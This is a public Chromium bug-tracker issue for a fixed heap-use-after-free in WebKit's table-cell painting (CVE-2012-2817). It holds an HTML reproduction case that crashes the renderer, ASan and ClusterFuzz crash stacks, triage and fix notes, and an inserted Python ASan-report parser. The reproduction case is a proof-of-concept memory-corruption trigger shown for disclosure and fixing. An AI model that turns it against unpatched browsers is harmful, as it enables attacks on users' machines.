Status: Fixed
Closed: Dec 2012
OS: All
Pri: 1
Type: Bug-Security
Heap-use-after-free in WebCore::RenderTableSection::paintCell
Reported by miau...@gmail.com, Mar 26 2012
VULNERABILITY DETAILS
use-after-free in WebCore::RenderTableSection::paintCell

VERSION
Chrome Version: dev

Chromium	19.0.1081.0 (Developer Build 128813)
OS	Linux
WebKit	536.4 (@111994)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        counter-reset: c;
      }
      #el0::after {
        content: counter(c);
        counter-reset: c;
      }
      #el1::after {
        content: counter(c);
        counter-reset: c;
      }
      #el2 {
        counter-reset: c;
        height: 1px;
        width: 1px;
        -webkit-perspective: 1;
        overflow-x: scroll;
      }
      #el3 {
        -webkit-animation-name: a;
        -webkit-animation-duration: 1s;
        content: counter(c);
      }
    </style>
    <script>
      onload = function() {
        el0 = document.createElement('div')
        el0.setAttribute('id', 'el0')
        document.body.appendChild(el0)
        el1 = document.createElement('div')
        el1.setAttribute('id', 'el1')
        el0.appendChild(el1)
        el2 = document.createElement('div')
        el2.setAttribute('id', 'el2')
        el1.appendChild(el2)
        el3 = document.createElement('div')
        el3.setAttribute('id', 'el3')
        el2.appendChild(el3)
        el2.style.display='table-footer-group'
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab + asan
Crash State: 

==20036== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca77c98 at pc 0x55555ad20bb1 bp 0x7fffffff1b90 sp 0x7fffffff1b88
READ of size 8 at 0x7fffeca77c98 thread T0
    #0 0x55555ad20bb1 in WebCore::RenderTableSection::paintCell(WebCore::RenderTableCell*, WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0
    #1 0x55555ad220eb in WebCore::RenderTableSection::paintObject(WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0


0x7fffeca77c98 is located 24 bytes inside of 200-byte region [0x7fffeca77c80,0x7fffeca77d48)
freed by thread T0 here:
    #0 0x55555de96522 in free ??:0
    #1 0x5555592fd687 in WebCore::Node::detach() ???:0
    #2 0x5555592c16fd in WebCore::Element::detach() ???:0
    #3 0x5555592c2a37 in WebCore::Element::recalcStyle(WebCore::Node::StyleChange) ???:0
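The ASan output above carries everything a triager needs (the access kind and size, the faulting address, its offset inside the freed region, and the two stacks), but in raw form. The following is an added example, not code from this issue, from Chromium or from ClusterFuzz: a small parser that reduces such a report to the "crash stack" / "free stack" summary that ClusterFuzz posts further down. The two-frame depth and the list of allocator frames to skip are assumptions of this example; the sample input is the report text from this issue, embedded so the script runs offline.

```python
"""Reduce an AddressSanitizer heap-use-after-free report to a compact crash state.

Added example (not part of this bug report, Chromium or ClusterFuzz). The frame depth
of 2 and the allocator-frame filter are assumptions chosen to mirror the summary
ClusterFuzz shows in this issue.
"""
import re
from typing import Dict, List, Optional

# Sample input: the ASan report pasted in this issue, embedded so the example runs offline.
SAMPLE_REPORT = """\
==20036== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffeca77c98 at pc 0x55555ad20bb1 bp 0x7fffffff1b90 sp 0x7fffffff1b88
READ of size 8 at 0x7fffeca77c98 thread T0
    #0 0x55555ad20bb1 in WebCore::RenderTableSection::paintCell(WebCore::RenderTableCell*, WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0
    #1 0x55555ad220eb in WebCore::RenderTableSection::paintObject(WebCore::PaintInfo&, WebCore::IntPoint const&) ???:0

0x7fffeca77c98 is located 24 bytes inside of 200-byte region [0x7fffeca77c80,0x7fffeca77d48)
freed by thread T0 here:
    #0 0x55555de96522 in free ??:0
    #1 0x5555592fd687 in WebCore::Node::detach() ???:0
    #2 0x5555592c16fd in WebCore::Element::detach() ???:0
    #3 0x5555592c2a37 in WebCore::Element::recalcStyle(WebCore::Node::StyleChange) ???:0
"""

# The header line; older ASan builds (as here) omit the colon after "AddressSanitizer".
HEADER_RE = re.compile(r"ERROR: AddressSanitizer:? (?P<kind>[\w-]+) on address (?P<addr>0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(?P<op>READ|WRITE) of size (?P<size>\d+) at (?P<addr>0x[0-9a-f]+)")
# A stack frame: "#N 0xADDR in FUNC(ARGS) FILE:LINE"; the location is optional ("??:0" when unknown).
FRAME_RE = re.compile(r"^\s*#(?P<n>\d+) 0x[0-9a-f]+ in (?P<func>.+?)(?: (?P<loc>\S+:\d+))?$")
REGION_RE = re.compile(r"is located (?P<off>\d+) bytes inside of (?P<size>\d+)-byte region")

# Allocator/runtime frames that carry no program context; skipped when building the
# crash state, just as the ClusterFuzz summary in this issue omits the "free" frame.
IGNORED_FUNCS = {"free", "malloc", "operator delete", "operator new"}


def strip_signature(func: str) -> str:
    """Drop the parameter list so frames compare by qualified function name only."""
    return func.split("(", 1)[0]


def parse_asan_report(text: str) -> Dict[str, object]:
    """Walk the report line by line, collecting the header fields and each named stack."""
    result: Dict[str, object] = {"kind": None, "address": None, "access": None,
                                 "size": None, "region": None, "stacks": {}}
    stacks: Dict[str, List[str]] = result["stacks"]  # type: ignore[assignment]
    current: Optional[List[str]] = None  # frames of the stack currently being read
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            result["kind"], result["address"] = m.group("kind"), m.group("addr")
            continue
        m = ACCESS_RE.match(line)
        if m:
            result["access"], result["size"] = m.group("op"), int(m.group("size"))
            current = stacks.setdefault("crash", [])
            continue
        if line.startswith("freed by"):
            current = stacks.setdefault("free", [])
            continue
        if line.startswith("previously allocated by"):
            current = stacks.setdefault("alloc", [])
            continue
        m = REGION_RE.search(line)
        if m:
            # (offset of the faulting address inside the freed chunk, chunk size)
            result["region"] = (int(m.group("off")), int(m.group("size")))
            continue
        m = FRAME_RE.match(line)
        if m and current is not None:
            current.append(strip_signature(m.group("func")))
    return result


def crash_state(report: Dict[str, object], depth: int = 2) -> Dict[str, List[str]]:
    """Top `depth` program frames of each stack, allocator frames removed (ClusterFuzz style)."""
    state: Dict[str, List[str]] = {}
    for name, frames in report["stacks"].items():  # type: ignore[union-attr]
        state[name] = [f for f in frames if f not in IGNORED_FUNCS][:depth]
    return state


def is_use_after_free(report: Dict[str, object]) -> bool:
    return report["kind"] == "heap-use-after-free"


if __name__ == "__main__":
    rep = parse_asan_report(SAMPLE_REPORT)
    print(f"{rep['kind']} {rep['access']} {rep['size']} at {rep['address']}, "
          f"offset {rep['region'][0]} into a {rep['region'][1]}-byte freed chunk")
    for name, frames in crash_state(rep).items():
        print(f"- {name} stack -")
        for f in frames:
            print(f"  {f}")
```

Keying deduplication on the filtered top frames is what lets a fuzzing pipeline recognise this crash as the same bug as issue 129677 even though the raw addresses differ between runs.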



 
Attachments: 24200.html (1.1 KB), 24200.txt (10.4 KB)
Summary: Heap-use-after-free in WebCore::RenderTableSection::paintCell (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=30740098

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f179dff4a98
Crash State:
  - crash stack -
  WebCore::RenderTableSection::paintCell
  WebCore::RenderTableSection::paintObject
  - free stack -
  WebCore::Node::detach
  WebCore::Element::detach
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=122724:122726

Minimized Testcase (1.07 Kb): https://cluster-fuzz.appspot.com/download/AMIfv975slP6uk7xTBUQ7P9k-EBPkMrh9wX6CoZqTJXt8M0oEr1FBeQusK1hd9ok-sQgCH0YwZuM9Oy6e5fdDmszxE6uGj3MoPi7-s0jZwqBzMRVx7Lu-pju2-qllWcBpKtkOPTOQr3E4ZOdOu_8rh1ksahvsPYTKA
Cc: jchaffraix@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecImpacts-None SecSeverity-High OS-All Mstone-19 Stability-AddressSanitizer
Status: Available
Comment 3 by laforge@google.com, Mar 27 2012
Labels: -Mstone-19 Mstone-20 MovedFrom-19
Labels: -MovedFrom-19 -Mstone-20 Mstone-19
Reverting the mass move. It does not apply to security bugs.
Mergedinto: 120944
Status: Duplicate
Let's stack these counter-related layout bugs together. Unless we fix them, they will keep crashing in weird places.
Project Member Comment 6 by clusterf...@chromium.org, Apr 4 2012
ClusterFuzz has detected this issue as fixed in range 130617:130650.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=30740098

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f179dff4a98
Crash State:
  - crash stack -
  WebCore::RenderTableSection::paintCell
  WebCore::RenderTableSection::paintObject
  - free stack -
  WebCore::Node::detach
  WebCore::Element::detach
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=122724:122726
Fixed: https://cluster-fuzz.appspot.com/revisions?range=130617:130650

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv975slP6uk7xTBUQ7P9k-EBPkMrh9wX6CoZqTJXt8M0oEr1FBeQusK1hd9ok-sQgCH0YwZuM9Oy6e5fdDmszxE6uGj3MoPi7-s0jZwqBzMRVx7Lu-pju2-qllWcBpKtkOPTOQr3E4ZOdOu_8rh1ksahvsPYTKA

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Mergedinto:
Status:
Cc: miau...@gmail.com
Issue 129677 has been merged into this issue.
Comment 3 by inferno@chromium.org, Today (2 minutes ago)
It does seem to hit this anonymous table wrapper code path, 

    if (parentIsLeftOverAnonymousWrapper) {
        ASSERT(!parent->firstChild());
        parent->destroyAndCleanupAnonymousWrappers();
    }

From the regression range, it seems to be coming from https://trac.webkit.org/changeset/108098/
Labels: reward-topanel
Presumably, the SecImpacts label is wrong now?
Labels: -SecImpacts-None SecImpacts-Stable SecImpacts-Beta
Verified locally by commenting out the lines, so it does seem to regress from https://trac.webkit.org/changeset/108098/
Cc: le...@chromium.org
Comment 15 by kenrb@chromium.org, May 25 2012
Owner: infe...@chromium.org
Status: Started
Comment 16 by kenrb@google.com, May 26 2012
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/118592
Labels: -Mstone-19 -Merge-Approved Mstone-20 Merge-Merged
M20: http://trac.webkit.org/changeset/118867
Labels: -reward-topanel reward-1000 reward-unpaid
@miaubiz: time to catch up on rewards ;-)
You may see a flood of activity and prosperity :)
Issue 129677 has been merged into this issue.
Labels: CVE-2012-2817
Labels: -reward-unpaid
Thanks miaubiz. Payment for this one is going out with a bunch of others as part of a $10k batch :D
Project Member Comment 23 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member Comment 25 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecImpacts-Stable -SecSeverity-High -Stability-AddressSanitizer -Mstone-20 -SecImpacts-Beta Cr-Content Security-Impact-Stable Security-Impact-Beta M-20 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 26 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 14 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 30 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 31 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 32 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 33 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 34 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 35 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 36 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic